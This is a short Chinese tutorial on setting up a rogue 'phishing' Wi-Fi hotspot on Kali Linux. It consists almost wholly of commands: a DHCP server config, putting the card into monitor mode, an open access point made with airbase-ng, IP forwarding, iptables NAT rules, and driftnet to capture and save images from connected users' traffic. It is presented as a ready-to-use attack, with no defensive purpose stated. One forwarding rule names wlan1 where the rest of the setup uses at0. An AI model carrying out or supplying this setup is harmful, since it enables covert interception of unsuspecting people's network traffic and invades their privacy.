Kali下建立钓鱼热点

使用工具：

1. isc-dhcp-server
2. Aircrack-ng套件
3. iptables

---

首先写dhcp配置文件/etc/dhcp/dhcpd.conf

authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name-servers 10.0.0.1;

range 10.0.0.10 10.0.0.100;

}

这里以10.0.0.1作为网关和dns服务器地址。

---

然后我们处理无线网卡

ifconfig wlan0 down           #wlan0为本机网卡的名称
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0

---

然后用airbase建立热点

airbase-ng -e Fishing -c 11 wlan0

---

热点的网络流量会被虚拟到at0这块网卡上面

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

---

打开ip转发

echo 1 > /proc/sys/net/ipv4/ip_forward

---

开启dhcp

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhclient-wlan0.pid at0 #也可能是其他名称
service isc-dhcp-server start

此时wifi可以连接，但是无法上网

---

配置NAT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡（或者什么能上网的网卡）上面
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356 #修改最大报文段长度

注意那第三个命令调整MSS，不加后果很严重

至此热点建立结束

---

图片嗅探
driftnet -i at0 #小窗口显示嗅探到的图片
driftnet -i at0 -a #保存嗅探到的图片